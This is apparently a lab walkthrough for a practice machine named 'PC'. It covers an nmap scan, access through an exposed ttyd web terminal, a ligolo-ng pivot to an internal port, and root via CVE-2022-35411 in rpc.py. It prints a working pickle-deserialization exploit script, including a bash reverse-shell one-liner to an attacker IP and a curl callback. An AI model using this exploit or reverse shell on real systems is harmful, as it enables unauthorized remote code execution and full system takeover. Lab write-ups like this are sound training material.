PC

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.210
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 09:14 +08
Nmap scan report for 192.168.158.210
Host is up (0.0072s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
8000/tcp open  http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|     <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 677047
|     <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb
|   Socks5, X11Probe: 
|     HTTP/1.0 403 Forbidden
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|_    <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.94SVN%I=7%D=6/12%Time=6668F686%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,9947,"HTTP/1\.0\x20200\x20OK\r\nserver:\x20ttyd/1\.7\.3-a23
SF:12cb\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncont
SF:ent-length:\x20677047\r\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><he
SF:ad><meta\x20charset=\"UTF-8\"><meta\x20http-equiv=\"X-UA-Compatible\"\x
SF:20content=\"IE=edge,chrome=1\"><title>ttyd\x20-\x20Terminal</title><lin
SF:k\x20rel=\"icon\"\x20type=\"image/png\"\x20href=\"data:image/png;base64
SF:,iVBORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG
SF:9iZSBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY
SF:2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8\+IDx4Onh
SF:tcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3
SF:JlIDUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gP
SF:HJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1z
SF:eW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU0
SF:9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi
SF:8vb")%r(X11Probe,127,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/
SF:1\.7\.3-a2312cb\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/h
SF:tml\r\ncontent-length:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8
SF:\x20http-equiv=\"Content-Language\"\x20content=\"en\"/><link\x20rel=\"s
SF:tylesheet\"\x20type=\"text/css\"\x20href=\"/error\.css\"/></head><body>
SF:<h1>403</h1></body></html>")%r(FourOhFourRequest,127,"HTTP/1\.0\x20404\
SF:x20Not\x20Found\r\nserver:\x20ttyd/1\.7\.3-a2312cb\x20\(libwebsockets/3
SF:\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent-length:\x20173\r\n\r\
SF:n<html><head><meta\x20charset=utf-8\x20http-equiv=\"Content-Language\"\
SF:x20content=\"en\"/><link\x20rel=\"stylesheet\"\x20type=\"text/css\"\x20
SF:href=\"/error\.css\"/></head><body><h1>404</h1></body></html>")%r(Socks
SF:5,127,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/1\.7\.3-a2312cb
SF:\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent-
SF:length:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8\x20http-equiv=
SF:\"Content-Language\"\x20content=\"en\"/><link\x20rel=\"stylesheet\"\x20
SF:type=\"text/css\"\x20href=\"/error\.css\"/></head><body><h1>403</h1></b
SF:ody></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.62 seconds

Initial Access

Port 8000

There is a webshell that is running on port 8000 as user.

We will run the reverse shell and run it on our own machine.

Next we will run linpeas.sh to check any potential PE vectors.

There is a hidden port that is located internally.

Privilege Escalation

Setting up local port forwarding

We will first start ligolo-ng on our local machine first.

Then we will run the ligolo-ng agent on the target machine.

user@pc:/home/user$ ./agent -connect 192.168.45.192:443 -ignore-cert
./agent -connect 192.168.45.192:443 -ignore-cert
time="2024-06-12T01:48:32Z" level=warning msg="warning, certificate validation disabled"
time="2024-06-12T01:48:32Z" level=info msg="Connection established" addr="192.168.45.192:443"

We will go into the session

ligolo-ng » session
? Specify a session : 1 - #1 - user@pc - 192.168.158.210:60866
[Agent : user@pc] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ ens160                         │
│ Hardware MAC │ 00:50:56:ab:71:fd              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.158.210/24             │
└──────────────┴────────────────────────────────┘

We will add the route using the script that I have made

This is the content of the script:

sudo ip tuntap add user ranay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add $1 dev ligolo

$ bash ligolo-add-route.sh 192.168.158.0/24                                        
[sudo] password for ranay: 
RTNETLINK answers: File exists

Since we are trying to access the agent's local port, we need to some extra steps.

$ sudo ip route add 240.0.0.1/32 dev ligolo

To start the tunnel, we will just do this.

[Agent : user@pc] » start
[Agent : user@pc] » INFO[0603] Starting tunnel to user@pc

Port 65432

After rescanning internally, we can see port 65432 is opened.

65432/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Kerberos, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     content-type: text/plain; charset=utf-8
|     Connection: close
|     Invalid HTTP request received.
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Wed, 12 Jun 2024 01:59:54 GMT
|     server: uvicorn
|     content-type: text/plain; charset=utf-8
|_    Connection: close

However, after testing out with the request, there is nothing much.

Relooking at the linpeas result, we found another interesting thing.

When we look at the content of the file, we can see that root is running this server.

from typing import AsyncGenerator
from typing_extensions import TypedDict

import uvicorn
from rpcpy import RPC

app = RPC(mode="ASGI")


@app.register
async def none() -> None:
    return


@app.register
async def sayhi(name: str) -> str:
    return f"hi {name}"


@app.register
async def yield_data(max_num: int) -> AsyncGenerator[int, None]:
    for i in range(max_num):
        yield i


D = TypedDict("D", {"key": str, "other-key": str})


@app.register
async def query_dict(value: str) -> D:
    return {"key": value, "other-key": value}


if __name__ == "__main__":
    uvicorn.run(app, interface="asgi3", port=65432)

CVE-2022-35411

GitHub - ehtec/rpcpy-exploit: Unauthenticated Remote Code Execution for rpc.py serverGitHub

First we will test if the exploit actually worked with this modified paylaod:

# Exploit Title: Remote Code Execution in rpc.py through 0.6.0
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411

import requests
import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py

HOST = "240.0.0.1:65432"

URL = f"http://{HOST}/sayhi"

HEADERS = {
    "serializer": "pickle"
}


def generate_payload(cmd):

    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload = pickle.dumps(PickleRce())

    print(payload)

    return payload


def exec_command(cmd):

    payload = generate_payload(cmd)

    requests.post(url=URL, data=payload, headers=HEADERS)


def main():
    exec_command('curl http://192.168.45.192')
    # exec_command('uname -a')


if __name__ == "__main__":
    main()

Sure enough, the exploit works

So, now we will put our actual payload into the exploit and then execute it

# Exploit Title: Remote Code Execution in rpc.py through 0.6.0
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411

import requests
import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py

HOST = "240.0.0.1:65432"

URL = f"http://{HOST}/sayhi"

HEADERS = {
    "serializer": "pickle"
}


def generate_payload(cmd):

    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload = pickle.dumps(PickleRce())

    print(payload)

    return payload


def exec_command(cmd):

    payload = generate_payload(cmd)

    requests.post(url=URL, data=payload, headers=HEADERS)


def main():
    exec_command("bash -c 'bash -i >& /dev/tcp/192.168.45.192/4445 0>&1'")
    # exec_command('uname -a')


if __name__ == "__main__":
    main()

After executing, we are able to get our root access shell.

PreviousLavita NextPlum

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagPort 8000

hashtagPrivilege Escalation

hashtagSetting up local port forwarding

hashtagPort 65432

hashtagCVE-2022-35411